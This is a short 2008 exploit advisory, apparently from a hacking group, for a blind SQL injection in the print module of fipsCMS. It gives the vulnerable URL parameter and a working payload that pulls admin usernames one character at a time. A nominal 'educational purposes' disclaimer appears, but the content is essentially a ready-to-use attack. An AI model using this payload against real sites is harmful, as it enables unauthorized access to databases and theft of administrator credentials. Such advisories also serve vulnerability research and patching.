fipscms-sql.txt
Posted on 08 May 2008
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| | _ __ __ __ ______ | | /' __ /'__' / \__ /'__' / ___ | | /\_, ___ /\_/\_L ___ ,_/ / _ __ \__/ | | /_/ /' _ ' / /_/_\_<_ /'___ / /\''__ \___'' | | / / / L / \__/ \_ \_ / / L | | \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ \____/ | | /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ /___/ | | \____/ >> Kings of injection | | /___/ | | | |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| Title :: Blind SQL Injection Author :: InjEctOr [s0f (at) w (dot) cn] && Hak3r-b0y [hak3r-b0y (at) hotmail (dot) com] Application :: fipsCMS [Print Module] Download :: http://www.fipsasp.com/home/index.asp?lg=1&w=pages&r=52&pid=73 Dork 1 :: Use ur mind ! ShoutZ :: Allah ,xError,ProViDor,all InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts. --------------------------------------------[C o n t e x t]----------------------------------------- Vulnerability: http://localhost/fipsCMS/modules/print.asp?lg=[SQL] Example : //IIF((select%20mid(last(username),1,1)%20 from%20(select%20top%2010%20username%20from%20admin))='a',0,'ko') -------------------------------------------[End of context]----------------------------------------
